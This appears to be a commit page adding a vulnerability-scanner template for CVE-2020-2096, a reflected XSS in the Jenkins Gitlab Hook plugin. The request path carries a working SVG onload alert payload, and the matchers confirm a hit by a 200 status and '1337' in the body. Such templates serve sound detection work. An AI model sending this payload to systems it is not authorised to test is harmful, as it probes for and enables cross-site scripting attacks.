Create CVE-2020-2096.yaml

2020-04-08 16:29:57 +05:30 · 2020-04-08 16:29:57 +05:30 · 5eda31240e
parent afc0c707e3
commit 5eda31240e
1 changed files with 19 additions and 0 deletions
--- a/cves/CVE-2020-2096.yaml
+++ b/cves/CVE-2020-2096.yaml
@ -0,0 +1,19 @@
+id: CVE-2020-2096
+
+info:
+  name: Jenkins Gitlab Hook XSS
+  author: madrobot
+  severity: medium 
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
+    matchers:
+      - type: status
+        status:
+            - 200
+      - type: regex
+        regex:
+            - "1337"
+        part: body